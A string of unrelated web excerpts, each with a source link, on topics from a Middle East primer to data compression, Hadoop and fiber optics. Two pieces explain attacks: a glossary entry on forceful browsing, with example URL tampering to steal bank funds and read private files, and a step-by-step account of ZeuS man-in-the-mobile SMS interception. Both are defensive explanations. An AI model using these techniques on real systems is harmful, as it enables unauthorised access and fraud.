Most people–especially in the West–know very little about the Middle East and the people who live there. This lack of knowledge hurts our ability to understand, and engage in intelligent discussion about, current events. For example, frighteningly few know the difference between Sunni and Shia Muslims, and most think the words “Arab” and “Muslim” are pretty much interchangeable. They aren’t. So here’s a very brief primer aimed at raising the level of knowledge about the region to an absolute minimum.

Arabs are part of an ethnic group, not a religion. Arabs were around long before Islam, and there have been (and still are) Arab Christians and Arab Jews. In general, you’re an Arab if you 1) are of Arab descent (blood), or 2) speak the main Arab language (Arabic).

Not all Arabs are Muslim. There are significant populations of Arab Christians throughout the world, including in Lebanon, Syria, Jordan, Northern Africa and Palestine/Israel.

Islam is a religion. A Muslim (roughly pronounced MOOSE-lihm) is someone who follows the religion. So you wouldn’t say someone follows Muslim or is an Islam, just as you wouldn’t say someone follows Christian or is a Christianity.

Shia Muslims are similar to Roman Catholics in Christianity. They have a strong clerical presence via Imams and promote the idea of going through them to practice the religion correctly.

Sunni Muslims are more like Protestant Christians. They don’t really focus on Imams and believe in maintaining a more direct line to God than the Shia.

Arabs are Semites. We’ve all heard the term anti-Semitism being used — often to describe Arabs. While antisemitism does specifically indicate hatred for Jews, the word “Semite” comes from the Bible and referred originally to anyone who spoke one of the Semitic languages. According to the Bible, Jews and Arabs are related [Genesis 25]. Jews descended from Abraham’s son Isaac, and Arabs descended from Abraham’s son Ishmael. So not only are both groups Semitic, but they’re also family.

Sunni Muslims make up most of the Muslim world (roughly 90%). The country with the world’s largest Muslim population is Indonesia.

The rift between the Shia and Sunni started right after Muhammad’s death and originally reduced to a power struggle regarding who was going to become the authoritative group for continuing the faith. The Shia believed Muhammad’s cousin Ali should have taken over (the family/cleric model). The Sunni believed that the best person for the job should be chosen by the followers (the merit model), and that’s how the first Caliph, Abu Bakr, was appointed. Although the conflict began as a political struggle, it is now mostly considered a religious and class conflict, with political conflict emanating from those rifts.

Sunni vs. Shia | Arab vs. Non-Arab

Here’s how the various Middle Eastern countries break down in terms of Sunni vs. Shia and whether or not they are predominantly Arab. Keep in mind that these are generalizations; significant diversity exists in many of the countries listed.
- Iraq: Mostly Shia (roughly 60%), but under Saddam the Shia were oppressed and the Sunni were in power despite being only 20% of the population. Arab.
- Iran: Shia. NOT Arab.
- Palestine: Sunni. Arab.
- Egypt: Sunni. Arab.
- Saudi Arabia: Sunni. Arab.
- Syria: Sunni. Arab.
- Jordan: Sunni. Arab.
- Gulf States: Sunni. Arab.
Source: https://danielmiessler.com/blog/10-facts-every-westerner-should-know-about-the-middle-east/
A fiber optic module is characterized by three functional elements: the transmitter, the receiver, and the transceiver that combines them. The transmitter converts electrical signals into optical signals for transmission over the fiber; at the receiving end, the optical signals are converted back into electrical signals.

According to function, fiber optic modules can be divided into fiber optic receiver modules, fiber optic transmission modules, fiber optic transceiver modules and fiber optic transponder modules.

The main function of a fiber optic transceiver module is to perform the conversion between optical and electrical signals, including optical power control, modulation, signal detection, I/V conversion and limiting-amplifier decision regeneration; in addition, there are security information query, TX-disable and other functions. Common fiber optic transceiver modules are: SFP, SFF, SFP+, GBIC, XFP, 1×9 and so on.

A fiber optic transmission module not only performs photoelectric conversion but also integrates many signal-processing functions, such as MUX/DEMUX, CDR, function control, energy acquisition and monitoring. Common fiber optic transmission modules include 200/300-pin, XENPAK, and X2/XPAK.

The optical transceiver module, referred to as the optical module or fiber optic module, is an important device in a fiber optic communication system.

According to the main parameters of a fiber optic module:
- Pluggability: hot-pluggable and non-hot-pluggable.
- Package: SFP, GBIC, XFP, XENPAK, X2, 1×9, SFF, 200/300-pin, XPAK.
- Transmission rate: the number of bits transmitted per second, expressed in Mb/s or Gb/s. Optical modules cover the following main rates: low rates, Fast Ethernet, Gigabit, 2.5G, 4.25G, 4.9G, 6G, 8G, 10G and 40G.

According to the optical module package:
1. XFP (10 Gigabit Small Form Factor Pluggable) is a hot-pluggable, protocol-independent optical transceiver for 10 Gbps Ethernet, SONET/SDH and Fibre Channel.
2. SFP (small form-factor pluggable) transceivers are currently the most widely used.
3. GigacBiDi series single-mode bidirectional optical modules use WDM technology so that a single fiber carries two-way information (point-to-point transmission, especially useful where fiber resources are insufficient and bidirectional signal transmission over one fiber is needed). The GigacBiDi series includes SFP Bidirectional (BiDi), GBIC Bidirectional (BiDi), SFP+ Bidirectional (BiDi), XFP Bidirectional (BiDi), SFF Bidirectional (BiDi) and so on.
4. The RJ45 transceiver is an electrical-port small form-factor pluggable module, also known as the electrical module or electrical interface module.
5. SFF: according to their pins, SFF transceivers are divided into 2×5, 2×10, etc.
6. Gigabit Ethernet Interface Converter (GBIC) modules.
7. Passive Optical Network (PON) modules (A-PON, G-PON, EPON OLT).
8. 40 Gbps high-speed optical modules.
9. SDH transmission modules (OC3, OC12, OC48).
10. Storage modules, such as 4G, 8G, etc.
Source: http://www.fs.com/blog/classifications-of-fiber-optic-modules.html
Liu J., ShenYang Agricultural University | Liu J., Collaborative Innovation Center for Genetic Improvement and Quality | Wang J., ShenYang Agricultural University | Wang J., Collaborative Innovation Center for Genetic Improvement and Quality | and 6 more authors. Plant Breeding | Year: 2015

Chlorophylls absorb and transfer light energy to the photosynthetic system. Consequently, chlorophyll content is strongly related to crop biomass and yield. We isolated a rice spontaneous mutant, lower chlorophyll b 1 (lcb1), from a recombinant inbred line population. Under normal growth conditions, lcb1 plants produced yellow leaves with decreased total chlorophyll and chlorophyll b contents, but normal chlorophyll a content. Photosynthetic and fluorescence parameters differed between wild-type and lcb1 plants. Compared with wild type, lcb1 had a higher electron transfer rate, a lower photochemical quenching coefficient and significantly reduced grain number, biomass and yield. A recessive nuclear gene controlled the mutant trait. Through map-based cloning, we located the LCB1 gene in a 117.4-kb region on the short arm of chromosome 3, close to the centromere, in a region containing 15 predicted candidate genes. None of these genes was directly related to chlorophylls or the chloroplast; therefore, lcb1 may be a mutation of a novel gene. These results will be useful for further research on the molecular mechanisms controlling biogenesis and chloroplast biochemical processes. © 2015 Blackwell Verlag GmbH.
Source: https://www.linknovate.com/affiliation/collaborative-innovation-center-for-genetic-improvement-and-quality-1997954/all/
Most organizations build centralized and huge data centers to serve their needs. Take, for instance, the facilities built by companies like Microsoft, Amazon and Google. All of them have come up near sources of the cheapest possible power and other locational advantages. Big data centers certainly have a few clear advantages. Having a few centralized facilities means economies of scale in purchases and operational expenditures. It also means simpler tax calculations and a better ability to support the local economy with jobs and support businesses. Companies also will opt for going green if it makes sense cost-wise. On the other side, a large data center can have a huge impact on water sources and prove to be a single point of failure. Going against the established norm of big data centers are companies like AOL, which has come up with an MDC, or micro data center. The company can work with minimal power and establish operations very quickly almost anywhere. Being able to access the network's edge is possible. But there are also the issues of management and distributed renewable power.
Source: http://www.datacenterjournal.com/distributed-vs-centralized-data-center/
Cost of Quality

So, you want to find lots of bugs, especially critical bugs, and also do so much more cheaply than the alternative: customers and users finding bugs in production. To measure this, use a technique called cost of quality to identify three main costs associated with testing and quality.

1. Cost of detection: the testing costs which you would incur even if you found no bugs. For example, setting up the test environment and creating test data are activities that incur costs of detection.
2. Cost of internal failure: the testing and development costs which you incur purely because you find bugs in prerelease testing. For example, filing bug reports and fixing bugs are activities that incur costs of internal failure.
3. Cost of external failure: the support, testing, development and other costs which you incur because you release systems with some number of bugs (just like everyone else). For example, much of the costs for technical support or help desk organizations and sustaining engineering teams are costs of external failure.

Calculate the average costs of a bug in testing and in production, as explained below:

1. The average cost of a test bug (ACTB) = (cost of detection + cost of internal failure) divided by the number of test bugs.
2. The average cost of a production bug (ACPB) = cost of external failure divided by the number of production bugs.

As I mentioned in a previous Knowledge Center article, the average cost of a bug found during prerelease testing is well below the average cost of a production bug, often by a factor of two, five, ten or more. The bigger the difference, the more optimized your quality assurance efforts are from a financial point of view. In addition, the more expensive it is for your organization to deal with bugs in production, the more it should invest in prerelease testing.

As you've seen in this article, quality need not be an elusive, subjective, unmanageable element in your projects. You can define quality objectives, derive important questions related to these objectives, devise metrics, set quality goals and measure quality progress. Organizations of all sizes, from small startups to large global enterprises, have already taken these steps toward quantitative quality management. You, too, can go beyond gut feel and rabbit's feet to set, and achieve, quality goals for your IT projects.

Rex Black is President of RBCS. Rex is also the immediate past president of the International Software Testing Qualifications Board and the American Software Testing Qualifications Board. Rex has published six books, which have sold over 50,000 copies, including Japanese, Chinese, Indian, Hebrew and Russian editions. Rex has written over thirty articles, presented hundreds of papers, workshops and seminars, and given over fifty speeches at conferences and events around the world. Rex may be reached at email@example.com.
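To make the two formulas concrete, here is a minimal Python sketch; the figures, function names and the release they describe are invented for illustration and are not from the article:

```python
def average_cost_of_test_bug(cost_of_detection, cost_of_internal_failure, test_bugs):
    """ACTB = (cost of detection + cost of internal failure) / number of test bugs."""
    return (cost_of_detection + cost_of_internal_failure) / test_bugs

def average_cost_of_production_bug(cost_of_external_failure, production_bugs):
    """ACPB = cost of external failure / number of production bugs."""
    return cost_of_external_failure / production_bugs

# Hypothetical figures for one release, purely for illustration.
actb = average_cost_of_test_bug(cost_of_detection=50_000,
                                cost_of_internal_failure=75_000,
                                test_bugs=250)            # $500 per test bug
acpb = average_cost_of_production_bug(cost_of_external_failure=120_000,
                                      production_bugs=40) # $3,000 per production bug

print(f"ACTB: ${actb:,.0f} per bug")
print(f"ACPB: ${acpb:,.0f} per bug")
print(f"A production bug costs {acpb / actb:.1f}x more than a test bug")
```

The ratio in the last line is the figure the article refers to: the larger it is, the stronger the financial case for prerelease testing.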
Source: http://www.eweek.com/c/a/IT-Management/How-to-Set-Quality-Goals-for-Your-IT-Projects/2
Henry C., Montpellier SupAgro | Raivoarisoa J.-F., Ambatovy | Razafimamonjy A., Ambatovy | Ramanankierana H., Centre National de Recherches sur l'Environnement | and 3 more authors. Forest Ecology and Management | Year: 2015

Ecological restoration in severely disturbed environments can fail because of lack of knowledge of the functioning of the original ecosystem. Nevertheless, facilitating establishment between plant species can help accelerate ecological succession, especially in stressful environments. Mycorrhizal symbiosis plays a key role in plant growth, particularly in harsh environments, and could also play a role in facilitation between plants, as mycorrhizal fungi can form a mycelial network that simultaneously interacts with the root systems of several plant species. In a high-elevation Malagasy tropical rainforest on acidic and iron-rich soil surrounding an active mining site, four genera of ectomycorrhizal plants are locally abundant: Leptolaena, Sarcolaena, Uapaca and Asteropeia. A floristic survey showed that only Asteropeia seedlings can grow on bare soil. Molecular analysis of ectomycorrhizal fungi ITS rDNA enabled us to describe ectomycorrhizal communities and their distribution among these four plant genera. Russulaceae, Boletales, Cortinariaceae and Thelephoraceae are abundant in these forests. There is extensive sharing between ectomycorrhizal communities associated with Asteropeia mcphersonii and other ectomycorrhizal plants. There are also many mycorrhizal fungi species which are common to ectomycorrhizal communities of seedlings and adult trees. This abundance of generalist fungi allows us to envisage the use of A. mcphersonii in the ecological restoration of the mine site. Planting ectomycorrhizal fungi in the bare soil at the beginning of ecological restoration could allow them to grow, thereby establishing a source of inoculum to colonize other ectomycorrhizal plants and consequently facilitate their establishment. © 2015 Published by Elsevier B.V.
Source: https://www.linknovate.com/affiliation/ambatovy-1154750/all/
0.10 Data Compression Algorithms

The goal of data compression is to represent some set of information as space-efficiently as possible. A data compression code is a mapping between some set of source messages and a set of codewords. A source message does not have to be, and usually is not, an entire string being compressed. Rather, it is one of the symbols or strings into which the data being compressed is partitioned for processing. These basic units may be single symbols from the source string's alphabet, or they may be strings of such symbols. The process of converting from a source stream into a coded (hopefully compressed) message is called encoding, while the inverse operation is called decoding. A lossless encoding method is one in which the process of decompression results in no loss of original data, whereas a lossy encoding method is one in which the original data cannot be fully recovered.

Codes can be of the types block-block or variable-variable. Codes of the block-block variety operate on static, fixed-length codewords and source messages, while their counterparts operate on dynamic-length codewords and source messages. One example of a block-block type code is the ASCII code. It is of the block-block variety because it maps fixed-length source messages (characters) into fixed-length codewords (their ASCII codes).

Because variable-variable type codes produce codewords that do not have a fixed length, when processing the output of a variable-variable code it is vital to be able to differentiate between codewords in the stream. Fixed-length codewords are easy to distinguish due to their regular spacing pattern. However, we do not have this luxury when dealing with variable-variable codes.

The sequence of codewords or source messages in a stream is called an ensemble. A coding function is called distinct if its mapping from source messages to codewords is one-to-one. Such a code is called uniquely decodable if every codeword is recognizable even when immersed in a stream of other codewords. A uniquely decodable code is known as a prefix code if it has the property that no codeword in the code is a prefix of any other codeword.

Data compression schemes are said to be either static or dynamic (or adaptive). A static function is one in which the mapping from the input source messages to the set of codewords is fixed before the data compression begins. In such a system a given message is always represented by the same codeword regardless of where it appears in the ensemble. In contrast, a dynamic (or adaptive) algorithm may change the mapping for a particular source message during the compression process.
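The prefix property is what makes decoding a variable-variable stream unambiguous without any separators. The Python sketch below (the four-symbol code table is invented for illustration) checks the prefix property and decodes an ensemble with such a code:

```python
def is_prefix_code(codewords):
    """True if no codeword is a prefix of any other codeword.
    After lexicographic sorting, any prefix pair ends up adjacent, so
    comparing neighbours is sufficient."""
    codewords = sorted(codewords)
    return all(not b.startswith(a)
               for a, b in zip(codewords, codewords[1:]))

def decode(bits, code):
    """Decode a bit string with a prefix code by scanning left to right."""
    inverse = {cw: msg for msg, cw in code.items()}
    out, buf = [], ""
    for bit in bits:
        buf += bit
        if buf in inverse:          # unambiguous thanks to the prefix property
            out.append(inverse[buf])
            buf = ""
    if buf:
        raise ValueError("trailing bits do not form a codeword")
    return out

# A toy static, variable-length code (shorter codewords for commoner messages).
code = {"a": "0", "b": "10", "c": "110", "d": "111"}
assert is_prefix_code(code.values())
print(decode("0101100111", code))   # ['a', 'b', 'c', 'a', 'd']
```

A static code like this one never changes during encoding; an adaptive scheme would update the `code` table as the ensemble is processed.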
Source: http://www.darkridge.com/~jpr5/mirror/alg/node163.html
Clustered computing for real-time Big Data analytics The concept of parallel processing based on a “clustered” multi-computer architecture has a long history dating back at least as far as Gene Amdahl’s work at IBM in the 1960s. But the current epoch of distributed computing is often traced to December of 2004, when Google researchers Jeffrey Dean and Sanjay Ghemawat presented a paper unveiling MapReduce. Developed as a model for “processing and generating large data sets,” MapReduce was built around the core idea of using a map function to process a key/value pair into a set of intermediate key/value pairs, and then a reduce function to merge all intermediate values associated with a given intermediate key. Dean and Ghemawat’s work generated instant buzz and led to the introduction of an open source implementation, Hadoop, in 2006. As the first efficient distributed-computing platform for large datasets that was accessible to the masses, Hadoop’s initial hoopla was well deserved. It has since gone on to become a key technology for running many web-scale services and products, and has also landed in traditional enterprise and government IT organizations for solving big data problems in finance, demographics, intelligence, and more. Hadoop and its components are built around several key functionalities. One is the HDFS filesystem, which allows large datasets to be distributed over many nodes. Another is the algorithms that “map” (split) a workload over the nodes, such that each is operating on its local piece of the dataset, and “reduce” to aggregate the results from each piece. Hadoop also provides redundancy and fault tolerance mechanisms across the nodes. The key innovation is that each node operates on locally stored data, eliminating the network bottleneck that constrained traditional high-performance computing clusters. The limits of Hadoop Hadoop is great for batch processing large source datasets into result sets when your questions are well defined and you know ahead of time how you will use the data. But what if you need fast answers to questions that can’t be completely defined in advance? That’s a situation that’s become increasingly common for data-driven businesses, which need to make critical, time-sensitive decisions informed by large datasets of metrics from their customers, operations, or infrastructure. Often the answer to an initial inquiry leads to additional questions in an iterative cycle of question » answer » refine until the key insight is finally revealed. The problem for Hadoop users is that the Hadoop architecture doesn’t lend itself to interactive, low latency, ad-hoc queries. So the iterative “rinse and repeat” process required to yield useful insights can take hours to days. That’s not acceptable in use cases such as troubleshooting or security, where every minute of query latency means prolonged downtime or poor user experience, either of which can directly impact revenue or productivity. One approach that’s been tried to address this issue is to use Hadoop to pre-calculate a series of result sets that support different classes of questions. This involves pre-selecting various combinations of dimensions/columns from the source data, and collapsing that data into multiple result sets that contain only those dimensions. 
Known as “multidimensional online analytical processing” (M-OLAP), this approach is sometimes referred to more succinctly as “data cubes.” Relatively fast queries can be asked of the result sets, and the resulting performance is certainly leaps and bounds better than anything available before the advent of big data. While the use of data cubes boosts Hadoop’s utility, it still involves compromise. If the source data contains many dimensions, it’s not feasible to generate and retain result sets for all of the possible combinations. The result sets also need to be continually regenerated to incorporate new source data. And the lag between events and data availability can make it difficult to answer real-time questions. So even with data cubes, Hadoop’s value in time-dependent applications is inherently constrained. Big Data in real time Among the organizations that ran up against Hadoop’s real-time limitations was Google itself. So in 2010 Google one-upped Hadoop, publishing a white paper titled “Dremel: Interactive Analysis of Web-Scale Datasets.” Subsequently exposed as the BigQuery service within Google Cloud, Dremel is an alternative big data technology explicitly designed for blazingly fast ad hoc queries. Among Dremel’s innovations are a columnar data layout and protocol buffers for efficient data storage and super-fast full table scans, along with a tree architecture for dispatching queries and collecting results across clusters containing hundreds or thousands of nodes. It also enables querying using ANSI SQL syntax, the “lingua franca” of analysts everywhere. Dremel’s results are truly impressive. It can execute full scan queries over billions of rows in seconds to tens-of-seconds — regardless of the dimensionality (number of columns) or cardinality (uniqueness of values within a column) — even when those queries contain complex conditions like regex matches. And since the queries operate directly on the source data, there is no data availability lag; the most recently appended data is available for every query. Because massively parallel disk I/O is a key prerequisite for this level of performance, a significant hardware footprint is required, with a price tag higher than many organizations would be willing to spend. But when offered as a multi-tenant SaaS, the cost-per-customer becomes quite compelling, while still providing the performance of the entire cluster for any given query. Post-Hadoop NetFlow analytics Dremel proved that it was possible to create a real-world solution enabling ad hoc querying at massive scale. That’s a game-changer for real-time applications such as network analytics. Flow records — NetFlow, sFlow, IPFIX, etc. — on a decent-sized network add up fast, and Hadoop-based systems for storing and querying those records haven’t been able to provide a detailed, real-time picture of network activity. Here at Kentik, however, we’ve drawn on many of the same concepts employed in Dremel to build our microservice-based platform for flow-based traffic analysis. Called Kentik Detect, this solution enables us to offer customers an analytical engine that’s not only powerful and cost-effective but also maintains real-time performance across web-scale datasets, a feat that is out of reach for systems built around Hadoop. (For more on how we make it work, see Inside the Kentik Data Engine.) 
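To make the columnar-layout point above concrete, here is a toy Python sketch (not Dremel, BigQuery or Kentik code; the flow-record fields and figures are invented) showing why a scan that references only two columns touches far less data when each column is stored contiguously:

```python
# The same flow records stored row-wise and column-wise, and a query that
# only needs two of the fields ("total bytes to port 443").
rows = [
    {"src_ip": "10.0.0.1", "dst_ip": "10.0.0.9", "dst_port": 443, "bytes": 1200},
    {"src_ip": "10.0.0.2", "dst_ip": "10.0.0.9", "dst_port": 53,  "bytes": 90},
    {"src_ip": "10.0.0.3", "dst_ip": "10.0.0.7", "dst_port": 443, "bytes": 560},
]

# Column-oriented layout: one contiguous array per field.
columns = {field: [r[field] for r in rows] for field in rows[0]}

# Row-store style scan: every record, with all of its fields, is touched.
row_total = sum(r["bytes"] for r in rows if r["dst_port"] == 443)

# Column-store style scan: only the two columns the query references are read,
# which is the property that lets Dremel-like engines run full scans quickly
# regardless of how many other columns the dataset carries.
col_total = sum(b for port, b in zip(columns["dst_port"], columns["bytes"])
                if port == 443)

assert row_total == col_total == 1760
```

The answers are identical; the difference is how many bytes have to stream off disk to produce them, which is where the parallel-I/O hardware footprint mentioned above comes in.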
The practical benefit of Kentik’s post-Hadoop approach is to enable network operators to perform — in real-time — a full range of iterative analytical tasks that previously took too long to be of value. You can see aggregate traffic volume across a multi-terabit network and then drill down to individual IPs and conversations. You can filter and segment your network traffic by any combination of dimensions on-the-fly. And you can alert on needle-in-the-haystack events within millions of flows per second. Kentik Detect helps network operators to uncover anomalies, plan for the future, and better understand both their networks and their business. Request a demo, or experience Kentik Detect’s performance for yourself by starting a free trial today.
Source: https://www.kentik.com/beyond-hadoop/
A growing population and expanding global activities continue to put Earth’s resources under pressure, and today many businesses face social, economic, and legislative pressures to make our future not only better, but greener. The Internet of Things (IoT) is bridging the physical and digital worlds, with new solutions that bring significant environmental benefits for people, businesses, and the planet. With 50 to 200 billion connected IoT devices being deployed by 2020, IoT is one thing that can positively contribute to the environment starting today. Companies like Taxibot, developer of the first robotic airplane towing vehicle; AgustaWestland, creator of an award-winning all-electric aircraft; and Schneider Electric, developer of an intelligent energy management system, are all making an impact by creating innovative products that address various environmental concerns—from increased emissions and global warming to the gradual depletion of energy sources.

What you will learn:
- Ways IoT can improve how we manage the Earth’s resources
- How companies are making a positive impact on our environment today
- How Wind River’s VxWorks is playing a role in helping create a greener Earth
Source: https://vts.inxpo.com/scripts/Server.nxp?LASCmd=AI:4;F:QS!10100&ShowKey=32882&AffiliateData=windriver
Using forceful browsing, attackers may gain access to restricted parts of the Web server directory. This kind of attack occurs when the attacker "forces" a URL by accessing it directly instead of following links.

The basic role of Web servers is to serve files. To prevent users from accessing unauthorized files on the Web server, Web servers provide two main security mechanisms: the root directory and access control lists. The root directory limits users' access to a specific directory within the Web server's file system. All files placed in the root directory and its sub-directories are accessible to users. Using access control lists, administrators can determine whether a file can be viewed or executed by users, as well as other access rights.

For example, consider a registration page that includes an HTML comment mentioning a file named _private/customer.txt. The file customer.txt was supposed to be an unreferenced file. However, by typing http://www.acme-hackme.com/_private/customer.txt, an attacker can retrieve the customer.txt file and view its contents. Other good examples are backup and temporary files. Appending "~", ".bak" or ".old" to HTML or CGI names may retrieve an older version of the source code. This is dangerous, as many developers embed material into development code that they later remove. For example, www.xxx.com/cgi-bin/admin.jsp~ returns the admin.jsp source code.

Attackers use forceful browsing to retrieve pages or perform operations that would otherwise require authentication. Assume Bob wants to transfer $100 to John. Bob logs in to his bank account and clicks on fundsxfer.asp. He then types in the account names and amount, and the form submits the transaction details to xfer.asp. Xfer.asp validates the input (the "from" parameter belongs to the authenticated user and the "sum" parameter does not exceed the available funds) and automatically redirects the browser to dofundxfer.asp?from=bob&to=john&sum=100. By accessing dofundxfer.asp directly, Bob can bypass the user verification and transfer money from John to himself simply by typing the URL with the parameters reversed (for example, dofundxfer.asp?from=john&to=bob&sum=100).

Forceful browsing is usually combined with Brute Force techniques to gather information by attempting to access as many URLs as possible to enumerate directories and files on a server. Attackers may check for all variations of commonly existing files. For example, a password file search would encompass files including psswd.txt, password.htm, password.dat, and other variations.
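The defense against the transfer scenario above is to repeat the authorization check on every request rather than trusting that the user arrived through the intended page flow. Below is a minimal, generic sketch of such a server-side check in Python; the function, session and account names are invented for illustration and are not tied to any particular web framework or product:

```python
# Hypothetical server-side handler standing in for dofundxfer.asp.
def handle_transfer(session, params, accounts):
    user = session.get("authenticated_user")
    if user is None:
        raise PermissionError("not logged in")              # force re-authentication

    src, dst, amount = params["from"], params["to"], float(params["sum"])

    # The crucial check: the logged-in user must own the source account,
    # regardless of how the URL was reached (link, bookmark, or typed by hand).
    if src != user:
        raise PermissionError("cannot transfer from another user's account")
    if amount <= 0 or accounts[src] < amount:
        raise ValueError("invalid or insufficient amount")

    accounts[src] -= amount
    accounts[dst] += amount
    return f"transferred {amount:.2f} from {src} to {dst}"

# Bob forcefully browsing to the handler with John's money cannot succeed:
accounts = {"bob": 500.0, "john": 100.0}
bob_session = {"authenticated_user": "bob"}
try:
    handle_transfer(bob_session, {"from": "john", "to": "bob", "sum": "100"}, accounts)
except PermissionError as err:
    print("rejected:", err)
```

The same idea applies to unreferenced files: access control lists on the server, not the absence of a link, are what keep _private/customer.txt out of reach.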
Source: https://www.imperva.com/Resources/Glossary?term=forceful_browsing
Data federation is run-time technology that makes it easy for an application to access a heterogeneous set of data stores. In this case, the data federator deals with all the different APIs and the different database languages, it will try to optimize access to those data stores by doing distributed join optimization, and it will handle all the issues of distributed transactions.

In my book on data virtualization (Data Virtualization for Business Intelligence Systems), I define data federation as follows: Data federation is an aspect of data virtualization where the data stored in a heterogeneous set of autonomous data stores is made accessible to data consumers as one integrated data store by using on-demand data integration.

Data virtualization is much more than data federation. Here are some of the features supported by data virtualization servers today:
- Self-service, iterative, and collaborative development
- (Canonical) data modeling
- On-demand data profiling and data cleansing
- Full support for the entire development life cycle: business glossary, information modeling
- Extensive data integrity features
- Extensive master data management features
- Integration of different data integration styles, including ETL, ELT, and replication

If you want to know more about this topic, attend my session at the Data Virtualization Experts Forum.
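As a toy illustration of the on-demand integration idea (this sketch is not taken from the book or from any data virtualization product; a SQLite table and an in-memory dictionary stand in for two autonomous, heterogeneous data stores):

```python
import sqlite3

# Store 1: a relational database (SQLite standing in for any SQL store).
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE customers (id INTEGER, name TEXT, country TEXT)")
db.executemany("INSERT INTO customers VALUES (?, ?, ?)",
               [(1, "Acme", "US"), (2, "Globex", "DE")])

# Store 2: a key/value service with its own API (a dict standing in for it).
credit_ratings = {1: "AA", 2: "BBB"}

def federated_customer_view():
    """On-demand integration: join the two stores at query time and present
    the result as if it came from a single integrated store."""
    for cust_id, name, country in db.execute("SELECT id, name, country FROM customers"):
        yield {"id": cust_id, "name": name, "country": country,
               "rating": credit_ratings.get(cust_id, "unrated")}

for row in federated_customer_view():
    print(row)
```

A real federator adds the pieces the sketch leaves out: query rewriting per store, distributed join optimization and distributed transaction handling.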
Source: http://www.b-eye-network.com/blogs/vanderlans/archives/2012/09/data_virtualiza_2.php
Keeping hacker cyber-nastiness away from manned or unmanned ground vehicles is the idea behind a 4.5-year, $6 million grant from the Defense Advanced Research Projects Agency (DARPA) to Carnegie Mellon University. The project is part of DARPA's High-Assurance Cyber Military System (HACMS) program launched last year to produce ultra-secure software systems to protect important networked assets from hacks, attacks or other cyber-disruptions.

From DARPA: "Embedded systems form a ubiquitous, networked, computing substrate that underlies much of modern technological society. Such systems range from large supervisory control and data acquisition (SCADA) systems that manage physical infrastructure to medical devices such as pacemakers and insulin pumps, to computer peripherals such as printers and routers, to communication devices such as cell phones and radios, to vehicles, airplanes and satellites. Such devices have been networked for a variety of reasons, including the ability to conveniently access diagnostic information, perform software updates, provide innovative features, lower costs, and improve ease of use. Researchers and hackers have shown that these kinds of networked systems are vulnerable to remote attack, and such attacks can cause physical damage while hiding the effects from monitors."

Key technologies expected to be developed under the program include semi-automated software synthesis systems, verification tools such as theorem provers and model checkers, and specification languages, DARPA stated. The program aims to produce a set of publicly available tools integrated into a high-assurance software workbench, widely distributed to both defense and commercial sectors. In the defense arena, HACMS plans to enable high-assurance military systems ranging from unmanned ground, air and underwater vehicles, to weapons systems, satellites, and command and control devices.

"This is an extremely challenging project as we work to develop secure robotic systems that are resilient to cyber-attacks," said Franz Franchetti, an associate research professor in Carnegie Mellon's Department of Electrical and Computer Engineering who received the grant. Franchetti said he is leading a team of researchers developing verification tools, including virtual high-assurance sensors and automatic software systems, to help computers figure out that they are under attack and to help them survive and continue operating.

The research also will "lay the groundwork for problem-solving involving the disruption of GPS service to critical consumer systems like other ground vehicles and high-end cars that feature a variety of computer systems to assist drivers," Franchetti said.
Source: http://www.networkworld.com/article/2224193/malware-cybercrime/carnegie-mellon-gets--6m-for-security-software-to-protect-vehicles-from-hackers.html
The world is going mobile. The ability to offer banking services, including the ability to make purchases, via mobile devices is increasingly becoming a competitive requirement for financial institutions. According to a 2009 report by analyst firm Informa Telecoms and Media, the number of mobile banking transactions will grow to more than 300 billion by 2013 with an estimated value of $860 billion. Research also estimates the number of mobile users conducting regular banking on their devices will rise to an astonishing 977 million by 2013.

As user acceptance of mobile banking becomes more mainstream, attacks against this communication channel will increase. Just as PC malware is now widespread, smart phone users will also be susceptible to drive-by downloads and phishing attacks from SMS messages with attachments. Although this type of attack is not yet a reality, it's only a matter of time before it is. In fact, a PC version of the Zeus Trojan exists today that allows fraudsters to trick users into installing code on their handset that can intercept and forward certain voice calls (i.e., those from a bank) to phone numbers they control.

Zeus is one of the most popular malware programs that specifically targets financial institutions in order to harvest sensitive information, including user names and passwords, from their customers in order to commit fraud. This Trojan infects PCs, waits for users to log onto their online banking application and then steals their credentials. The information is then sent to a remote server in real time. The Trojan can also create its own HTML content, tricking users into divulging even more personal information, such as their social security number or PIN. According to our estimates, ZeuS has infected between 0.5% and 1% of all PCs in the western world. As recently as December 2010, a major ZeuS attack left millions of Facebook users susceptible to identity theft.

With banks liable for most consumer fraud losses under Regulation E, the need for new methods to thwart these cyber thefts is urgent. One such initiative is to use mobile devices to authenticate online transactions. In theory, mobile handsets can be used not just to send SMS messages to authenticate individual transactions, but also to contact customers if there is suspected fraudulent activity on their account. However, even before its launch, this approach could be defeated.

The Man-in-the-Mobile (MitMo) Attack

Hackers behind the ZeuS Trojan have modified its attack code to stage remote take-overs of smartphones, which in turn allows them to launch a man-in-the-mobile (MitMo) attack. Here's how it is done:

Step 1: ZeuS first infects the user's PC and steals the user's online banking credentials. It then mimics a message from the bank requesting the user to supply their mobile telephone number, make and model to 'set up' the authentication method.
Step 2: The attacker then sends an SMS message to the user's mobile device asking them to download a new digital certificate to complete the process.
Step 3: The user follows the link and downloads the 'digital certificate.'
Step 4: The 'digital certificate' is actually a smartphone applet that creates a backdoor into the handset that, when triggered, instructs the handset not to display a given text message (i.e., the authentication code from the bank) on the phone's screen, but instead forward it to the hacker's own mobile device or computer across the Internet.
Step 5: The elements necessary to carry out a MitMo attack are now in place.
The difference between MitMo and a 'conventional' Man-in-the-Browser attack routine is that hackers effectively control the browser session AND the user's smartphone, giving them 'authenticated' access to online banking sessions.

Step 6: The hacker then initiates a banking transaction.
Step 7: The bank sends an SMS to the mobile device linked to that account to authenticate the transaction. However, this SMS is intercepted and remotely streamed to a device controlled by the attacker.
Step 8: The attacker provides authentication and the bank completes the transaction. The user is completely unaware of what has just taken place until they next check their bank balance or receive a statement.

Much has been made of the "Walled Garden" approach used by the iPhone and other mobile platforms, which are designed to provide users with only "approved" applications and theoretically stem the threat of mobile attacks. But the "walled" approach is not foolproof. Some users, becoming frustrated with this approach, purposely unlock their devices to install unlicensed applications. Once the device is unlocked, security crumbles, making it just as vulnerable to malicious software as "un-walled" devices. Users are never 100 percent protected from attack, "Walled Garden" or not.

What can be done?

As the scenario above illustrates, two-factor authentication doesn't protect against all threats, such as ZeuS MitMo and MitB attacks. These attacks allow cyber criminals to hijack online banking sessions and render many multi-factor and strong authentication measures meaningless. To ensure that criminals aren't able to commandeer the mobile platform before it even has the chance to get off the ground, banks should consider:

